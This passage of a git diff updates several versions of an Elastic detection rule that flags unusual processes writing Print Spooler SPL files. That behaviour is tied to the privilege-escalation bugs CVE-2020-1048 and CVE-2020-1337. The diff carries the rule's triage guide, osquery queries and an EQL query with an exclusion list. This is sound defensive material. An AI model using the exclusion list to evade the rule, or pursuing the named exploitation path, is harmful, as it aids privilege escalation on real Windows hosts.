searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json index 85126db18bd..c151db1a19a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json index 237004b1e6d..88cdb23bbe4 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json index 8a3bb012775..be5b2d77f9a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, 